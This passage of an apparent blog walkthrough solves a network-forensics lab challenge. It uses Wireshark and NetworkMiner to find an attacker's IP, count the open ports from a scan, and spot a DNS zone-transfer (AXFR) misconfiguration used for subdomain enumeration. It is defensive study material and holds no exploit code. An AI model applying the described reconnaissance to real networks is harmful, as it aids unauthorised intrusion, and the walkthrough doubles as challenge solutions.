srcset="https://substackcdn.com/image/fetch/$s_!ARHC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png 424w, https://substackcdn.com/image/fetch/$s_!ARHC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png 848w, https://substackcdn.com/image/fetch/$s_!ARHC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png 1272w, https://substackcdn.com/image/fetch/$s_!ARHC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ARHC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png" width="1456" height="324" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:324,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ARHC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png 424w, https://substackcdn.com/image/fetch/$s_!ARHC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png 848w, https://substackcdn.com/image/fetch/$s_!ARHC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png 1272w, https://substackcdn.com/image/fetch/$s_!ARHC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p><strong>2. What is the IP address of the Attacker?</strong></p><p>Using Wireshark, we analyze http.request logs to identify external connections. By examining command injection attempts, we determine the attacker's IP address.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9wKd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9wKd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png 424w, https://substackcdn.com/image/fetch/$s_!9wKd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png 848w, https://substackcdn.com/image/fetch/$s_!9wKd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png 1272w, https://substackcdn.com/image/fetch/$s_!9wKd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9wKd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png" width="824" height="455" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:455,&quot;width&quot;:824,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9wKd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png 424w, https://substackcdn.com/image/fetch/$s_!9wKd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png 848w, https://substackcdn.com/image/fetch/$s_!9wKd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png 1272w, https://substackcdn.com/image/fetch/$s_!9wKd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69b0d865-a7ab-4fff-8bfa-33746f5bef42_824x455.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>3. How many open ports were discovered by the attacker?</strong></p><p>NetworkMiner initially shows 15 open ports, but verification using Wireshark is needed. Filtering with:</p><p>ip.src == 192.168.1.3 &amp;&amp; ip.dst == 192.168.1.5 &amp;&amp; tcp.port == 5555</p><p>reveals RST/ACK packets indicating some ports were actually closed. A detailed analysis is conducted to count only truly open ports.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5lr0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5lr0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png 424w, https://substackcdn.com/image/fetch/$s_!5lr0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png 848w, https://substackcdn.com/image/fetch/$s_!5lr0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png 1272w, https://substackcdn.com/image/fetch/$s_!5lr0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5lr0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png" width="1034" height="235" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:235,&quot;width&quot;:1034,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:28154,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!5lr0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png 424w, https://substackcdn.com/image/fetch/$s_!5lr0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png 848w, https://substackcdn.com/image/fetch/$s_!5lr0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png 1272w, https://substackcdn.com/image/fetch/$s_!5lr0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3a87e72-5a48-4170-8e62-b440b9460f81_1034x235.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_vio!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_vio!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png 424w, https://substackcdn.com/image/fetch/$s_!_vio!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png 848w, https://substackcdn.com/image/fetch/$s_!_vio!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png 1272w, https://substackcdn.com/image/fetch/$s_!_vio!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_vio!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png" width="1061" height="337" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:337,&quot;width&quot;:1061,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_vio!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png 424w, https://substackcdn.com/image/fetch/$s_!_vio!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png 848w, https://substackcdn.com/image/fetch/$s_!_vio!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png 1272w, https://substackcdn.com/image/fetch/$s_!_vio!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6894d728-1ce3-4f6d-89b3-87ee5d74b878_1061x337.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>4. What are the first five ports identified by the attacker in numerical order?</strong></p><p>By filtering Wireshark for SYN-ACK responses and checking timestamps, we list the first five open ports.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dUDX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dUDX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png 424w, https://substackcdn.com/image/fetch/$s_!dUDX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png 848w, https://substackcdn.com/image/fetch/$s_!dUDX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png 1272w, https://substackcdn.com/image/fetch/$s_!dUDX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dUDX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png" width="1456" height="179" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f1581128-1e23-41d6-959b-d2719605900b_1527x188.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:179,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dUDX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png 424w, https://substackcdn.com/image/fetch/$s_!dUDX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png 848w, https://substackcdn.com/image/fetch/$s_!dUDX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png 1272w, https://substackcdn.com/image/fetch/$s_!dUDX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1581128-1e23-41d6-959b-d2719605900b_1527x188.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>5. What misconfiguration allowed subdomain enumeration?</strong></p><p>DNS zone transfers (AXFR) can expose subdomains. Filtering for AXFR traffic in Wireshark confirms the misconfiguration.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!V6oN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!V6oN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png 424w, https://substackcdn.com/image/fetch/$s_!V6oN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png 848w, https://substackcdn.com/image/fetch/$s_!V6oN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png 1272w, https://substackcdn.com/image/fetch/$s_!V6oN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!V6oN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png" width="1456" height="125" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cf349fbb-972a-440e-8857-850d9a1832da_2451x210.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:125,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!V6oN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png 424w, https://substackcdn.com/image/fetch/$s_!V6oN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png 848w, https://substackcdn.com/image/fetch/$s_!V6oN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png 1272w, https://substackcdn.com/image/fetch/$s_!V6oN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf349fbb-972a-440e-8857-850d9a1832da_2451x210.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>6. How many subdomains were discovered by the attacker?</strong></p><p>Examining the AXFR packet&#8217;s answer section reveals the number of subdomains.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mYv3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mYv3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png 424w, https://substackcdn.com/image/fetch/$s_!mYv3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png 848w, https://substackcdn.com/image/fetch/$s_!mYv3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png 1272w, https://substackcdn.com/image/fetch/$s_!mYv3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mYv3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png" width="1275" height="606" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/39369410-acd0-4685-9333-618c5cba59a3_1275x606.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:606,&quot;width&quot;:1275,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mYv3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png 424w, https://substackcdn.com/image/fetch/$s_!mYv3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png 848w, https://substackcdn.com/image/fetch/$s_!mYv3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png 1272w, https://substackcdn.com/image/fetch/$s_!mYv3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39369410-acd0-4685-9333-618c5cba59a3_1275x606.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 